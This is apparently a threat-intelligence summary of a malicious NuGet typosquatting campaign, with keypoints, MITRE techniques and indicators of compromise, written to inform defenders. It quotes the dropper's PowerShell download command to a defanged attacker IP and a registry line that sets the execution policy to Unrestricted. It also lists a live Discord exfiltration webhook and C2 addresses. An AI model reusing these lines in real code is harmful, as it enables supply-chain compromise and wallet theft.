JFrog Security Research uncovered a sophisticated NuGet-based campaign targeting .NET developers, employing typosquatting and deceptive metadata to push a PowerShell-based dropper that downloads a second-stage Impala payload. The attack demonstrates how NuGet can be abused to auto-run code on installation and deliver a configurable, low-level executable via HTTP, with exfiltration tied to Discord webhooks and other C2 capabilities. #NuGet #PowerShell #init_ps1 #Impala #DiscordWebhooks
Keypoints
- The campaign targeted .NET developers via the NuGet repository using typosquatting to spread malicious packages that were downloaded about 150K times before removal.
- A PowerShell dropper (init.ps1) runs on package installation, downloading a second-stage payload and executing it, showing that NuGet can still auto-run code in some scenarios.
- Attackers employed deception: mimicking legitimate packages, spoofing authors, and using misleading metadata to appear legitimate.
- The second-stage payload, named Impala, is a custom, low-level executable capable of crypto-stealing, Discord webhook exfiltration, Electron archive extraction, and an auto-updater mechanism.
- defensive notes emphasize typosquatting, inspecting tools scripts (init.ps1/install.ps1/uninstall.ps1), and using NuGet Package Explorer to verify package contents before installation.
MITRE Techniques
- [T1195] Supply Chain Compromise – Malicious NuGet packages used to deliver payload. Quote: “…attack targeting .NET developers via the NuGet repository, using sophisticated typosquatting techniques…”
- [T1036] Masquerading – Package owner names and metadata designed to appear legitimate. Quote: “The package owner names used terms which attempt to make the package appear more legitimate (BinanceOfficial, NuGetDev, OfficialDevelopmentTeam)…”
- [T1059.001] PowerShell – Init.ps1 / tools/init_ps1 executed to run commands on install. Quote: “PowerShell script that would execute upon installation” and “the init script automatic execution won’t occur while using the NuGet CLI.”
- [T1105] Ingress Tool Transfer – The dropper downloads an executable from a remote server. Quote: “$WebFile = ‘http://62[.]182[.]84[.]61/4563636/$ProcName’ (New-Object System.Net.WebClient).DownloadFile($WebFile,”$env:APPDATA$ProcName”)”
- [T1562.001] Impair Defenses – Execution policy changed to Unrestricted to allow script execution. Quote: “New-ItemProperty -Path ‘HKCU:SoftwareMicrosoftPowerShell1ShellIdsMicrosoft.PowerShell’ -Name ‘ExecutionPolicy’ -Value ‘Unrestricted’ -PropertyType String -Force”
- [T1567.002] Exfiltration to Web Services – Crypto wallet exfil via Discord webhooks. Quote: “Discord Webhooks, which may suggest the payload tries to exfiltrate crypto wallets via Discord webhooks”
Indicators of Compromise
- [URL] Discord webhook used for data exfiltration – https://discord.com/api/webhooks/1076330498026115102/MLkgrUiivlgAoFWyvkSpLsBE3DMaDZd9cxPK3k9XQPyh6dw55jktV6qfDgxbs5AaY7Py
- [IP Address] Command-and-control / payload download hosts – 62.182.84.61, 194.233.93.50, and 195.58.39.167
- [URL] Pastebin-like reference containing sample C2/payload information – https://paste bingner.com/paste/xden6/raw
- [File] Updater component used by malware – Squirrel-2021Updater.exe